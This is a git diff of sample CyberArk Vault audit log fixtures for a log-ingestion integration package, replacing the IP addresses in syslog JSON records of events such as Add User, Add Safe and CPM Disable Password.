a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/130_cpm_disable_password.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/130_cpm_disable_password.log @@ -1 +1 @@ -<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/180_add_user.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/180_add_user.log index 78ec9f57fe6..e9e3529abd7 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/180_add_user.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/180_add_user.log @@ -1,12 +1,12 @@ -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T17:59:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T17:59:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 67.43.156.13\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 67.43.156.13\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/181_update_safe.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/181_update_safe.log index 93d8a45a00e..9ace149430f 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/181_update_safe.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/181_update_safe.log @@ -1 +1 @@ -<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}} +<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/185_add_safe.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/185_add_safe.log index 21a17a2c729..bfe809491fe 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/185_add_safe.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/185_add_safe.log @@ -1,2 +1,2 @@ -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} -<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Add Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} +<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 67.43.156.13\n \n \n \n \n \n Add Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/187_add_folder.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/187_add_folder.log index 3f7fa511cc8..a9d4c8d1111 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/187_add_folder.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/187_add_folder.log @@ -1,2 +1,2 @@ -<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}} +<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}} <5>1 2021-03-11T18:01:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:01:14\n 2021-03-11T18:01:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 187\n Add Folder\n Info\n PVWAAppUser\n Add Folder\n \n \n PSMUnmanagedSessionAccounts\n 